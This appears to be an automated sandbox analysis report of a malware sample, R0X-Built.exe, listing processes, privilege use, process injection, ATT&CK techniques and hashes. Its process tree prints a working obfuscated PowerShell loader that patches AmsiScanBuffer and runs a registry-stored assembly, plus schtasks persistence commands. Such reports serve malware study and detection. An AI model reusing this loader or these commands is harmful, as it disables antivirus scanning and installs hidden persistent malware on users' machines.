powershell.EXEdllhost.exe$srr-powershell.exewmiprvse.exepid process 4072 powershell.EXE 4072 powershell.EXE 4072 powershell.EXE 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 1232 $srr-powershell.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 1232 $srr-powershell.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2956 wmiprvse.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 1232 $srr-powershell.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 1232 $srr-powershell.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 1232 $srr-powershell.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe 2192 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
R0X-Built.exepowershell.EXE$srr-powershell.exedllhost.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2868 R0X-Built.exe Token: SeDebugPrivilege 4072 powershell.EXE Token: SeDebugPrivilege 1232 $srr-powershell.exe Token: SeDebugPrivilege 4072 powershell.EXE Token: SeDebugPrivilege 2192 dllhost.exe Token: SeAuditPrivilege 2504 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2364 svchost.exe Token: SeIncreaseQuotaPrivilege 2364 svchost.exe Token: SeSecurityPrivilege 2364 svchost.exe Token: SeTakeOwnershipPrivilege 2364 svchost.exe Token: SeLoadDriverPrivilege 2364 svchost.exe Token: SeSystemtimePrivilege 2364 svchost.exe Token: SeBackupPrivilege 2364 svchost.exe Token: SeRestorePrivilege 2364 svchost.exe Token: SeShutdownPrivilege 2364 svchost.exe Token: SeSystemEnvironmentPrivilege 2364 svchost.exe Token: SeUndockPrivilege 2364 svchost.exe Token: SeManageVolumePrivilege 2364 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2364 svchost.exe Token: SeIncreaseQuotaPrivilege 2364 svchost.exe Token: SeSecurityPrivilege 2364 svchost.exe Token: SeTakeOwnershipPrivilege 2364 svchost.exe Token: SeLoadDriverPrivilege 2364 svchost.exe Token: SeSystemtimePrivilege 2364 svchost.exe Token: SeBackupPrivilege 2364 svchost.exe Token: SeRestorePrivilege 2364 svchost.exe Token: SeShutdownPrivilege 2364 svchost.exe Token: SeSystemEnvironmentPrivilege 2364 svchost.exe Token: SeUndockPrivilege 2364 svchost.exe Token: SeManageVolumePrivilege 2364 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2364 svchost.exe Token: SeIncreaseQuotaPrivilege 2364 svchost.exe Token: SeSecurityPrivilege 2364 svchost.exe Token: SeTakeOwnershipPrivilege 2364 svchost.exe Token: SeLoadDriverPrivilege 2364 svchost.exe Token: SeSystemtimePrivilege 2364 svchost.exe Token: SeBackupPrivilege 2364 svchost.exe Token: SeRestorePrivilege 2364 svchost.exe Token: SeShutdownPrivilege 2364 svchost.exe Token: SeSystemEnvironmentPrivilege 2364 svchost.exe Token: SeUndockPrivilege 2364 svchost.exe Token: SeManageVolumePrivilege 2364 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2364 svchost.exe Token: SeIncreaseQuotaPrivilege 2364 svchost.exe Token: SeSecurityPrivilege 2364 svchost.exe Token: SeTakeOwnershipPrivilege 2364 svchost.exe Token: SeLoadDriverPrivilege 2364 svchost.exe Token: SeSystemtimePrivilege 2364 svchost.exe Token: SeBackupPrivilege 2364 svchost.exe Token: SeRestorePrivilege 2364 svchost.exe Token: SeShutdownPrivilege 2364 svchost.exe Token: SeSystemEnvironmentPrivilege 2364 svchost.exe Token: SeUndockPrivilege 2364 svchost.exe Token: SeManageVolumePrivilege 2364 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2364 svchost.exe Token: SeIncreaseQuotaPrivilege 2364 svchost.exe Token: SeSecurityPrivilege 2364 svchost.exe Token: SeTakeOwnershipPrivilege 2364 svchost.exe Token: SeLoadDriverPrivilege 2364 svchost.exe Token: SeSystemtimePrivilege 2364 svchost.exe Token: SeBackupPrivilege 2364 svchost.exe Token: SeRestorePrivilege 2364 svchost.exe Token: SeShutdownPrivilege 2364 svchost.exe Token: SeSystemEnvironmentPrivilege 2364 svchost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3420 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 2868 wrote to memory of 5040 2868 R0X-Built.exe schtasks.exe PID 2868 wrote to memory of 5040 2868 R0X-Built.exe schtasks.exe PID 2868 wrote to memory of 5040 2868 R0X-Built.exe schtasks.exe PID 2868 wrote to memory of 1232 2868 R0X-Built.exe $srr-powershell.exe PID 2868 wrote to memory of 1232 2868 R0X-Built.exe $srr-powershell.exe PID 2868 wrote to memory of 1232 2868 R0X-Built.exe $srr-powershell.exe PID 2868 wrote to memory of 4352 2868 R0X-Built.exe install.exe PID 2868 wrote to memory of 4352 2868 R0X-Built.exe install.exe PID 2868 wrote to memory of 4352 2868 R0X-Built.exe install.exe PID 2868 wrote to memory of 608 2868 R0X-Built.exe SCHTASKS.exe PID 2868 wrote to memory of 608 2868 R0X-Built.exe SCHTASKS.exe PID 2868 wrote to memory of 608 2868 R0X-Built.exe SCHTASKS.exe PID 1232 wrote to memory of 4180 1232 $srr-powershell.exe schtasks.exe PID 1232 wrote to memory of 4180 1232 $srr-powershell.exe schtasks.exe PID 1232 wrote to memory of 4180 1232 $srr-powershell.exe schtasks.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 4072 wrote to memory of 2192 4072 powershell.EXE dllhost.exe PID 2192 wrote to memory of 600 2192 dllhost.exe winlogon.exe PID 2192 wrote to memory of 660 2192 dllhost.exe lsass.exe PID 2192 wrote to memory of 940 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1020 2192 dllhost.exe dwm.exe PID 2192 wrote to memory of 508 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 712 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 744 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1048 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1100 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1224 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1240 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1324 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1352 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1372 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1400 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1408 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1536 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1572 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1580 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1688 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1736 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1808 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1816 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1912 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1932 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1964 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1972 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 1656 2192 dllhost.exe spoolsv.exe PID 2192 wrote to memory of 2152 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2228 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2336 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2344 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2364 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2376 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2492 2192 dllhost.exe sysmon.exe PID 2192 wrote to memory of 2504 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2520 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2560 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 2892 2192 dllhost.exe sihost.exe PID 2192 wrote to memory of 2912 2192 dllhost.exe svchost.exe PID 2192 wrote to memory of 3032 2192 dllhost.exe taskhostw.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:600
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{83931138-798f-412e-8b87-514e4c8143f4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1224 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KmqiDutKjTQu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xfmodHseHZaIDj,[Parameter(Position=1)][Type]$Bdhbtnoonb)$MiEjfMVgyzV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+'D'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'ubl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+'d'+','+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'l'+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'la'+'s'+''+[Char](115)+'',[MulticastDelegate]);$MiEjfMVgyzV.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+'g'+','+''+'P'+''+[Char](117)+''+[Char](98)+'lic',[Reflection.CallingConventions]::Standard,$xfmodHseHZaIDj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+'e'+''+','+'Ma'+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$MiEjfMVgyzV.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+'wS'+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+'l'+'',$Bdhbtnoonb,$xfmodHseHZaIDj).SetImplementationFlags('Run'+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+'an'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $MiEjfMVgyzV.CreateType();}$MFKixJyjdHuvX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+'.'+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'Uns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$mkINzBfnYwAayg=$MFKixJyjdHuvX.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+'ddr'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DuiZIWHjuUKcDCHqfLr=KmqiDutKjTQu @([String])([IntPtr]);$aJiXPyiCgdNJGtnUHjXYOo=KmqiDutKjTQu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$RKLMteHNTsR=$MFKixJyjdHuvX.GetMethod(''+'G'+''+'e'+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+'3'+'2'+[Char](46)+''+[Char](100)+''+'l'+'l')));$rUldKsjUZEJGwV=$mkINzBfnYwAayg.Invoke($Null,@([Object]$RKLMteHNTsR,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$MZmOGWiMGtVhAJUfk=$mkINzBfnYwAayg.Invoke($Null,@([Object]$RKLMteHNTsR,[Object](''+[Char](86)+'ir'+'t'+''+'u'+''+[Char](97)+''+'l'+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$zCLCBoE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUldKsjUZEJGwV,$DuiZIWHjuUKcDCHqfLr).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+''+'l'+'');$phnXGjDMWxjNkTnQR=$mkINzBfnYwAayg.Invoke($Null,@([Object]$zCLCBoE,[Object](''+'A'+''+[Char](109)+'s'+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'ffe'+[Char](114)+'')));$QuWYRJdnmC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MZmOGWiMGtVhAJUfk,$aJiXPyiCgdNJGtnUHjXYOo).Invoke($phnXGjDMWxjNkTnQR,[uint32]8,4,[ref]$QuWYRJdnmC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$phnXGjDMWxjNkTnQR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MZmOGWiMGtVhAJUfk,$aJiXPyiCgdNJGtnUHjXYOo).Invoke($phnXGjDMWxjNkTnQR,[uint32]8,0x20,[ref]$QuWYRJdnmC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue('$7'+'7'+'s'+[Char](116)+''+'a'+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1400
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1536
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1972
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2376
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2912
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3332
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3420 -
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:5040
-
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4352
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:608
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3556
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3904
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3328
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2168
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1592
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4300
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1076
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:3188
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4008
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:1264
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e255fbec858977dd40cfb3534e0d2da8 1DRtY2uW/UGEukRgejn9TA.0.1.0.0.01⤵
- Sets service image path in registry
PID:3816 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1660
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1428
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:5048
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:3532
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2356
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:4452
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:3852
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:1668
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:8
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5eebec818855d247ea49004cf09b122d9
SHA103ce37ee49d0bffbd70bca89efc1f70c85d60435
SHA2562ebc596f6afe4608b92fc1d04352b81c04b6a0e3ea3a73112246bef60c5a915e
SHA512bdee4d26dc36768c4b80d63d92e09b9289bf132887e71bc4c9c036886bff38a7c992de7c56093348f0cca25c36a335c46e3065fe80bc2075b82d4fd2de174e08
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD58014a36c3296c5be3e7151cf44f87ae8
SHA19070064cdff88d5e4b68df5134dce16093901363
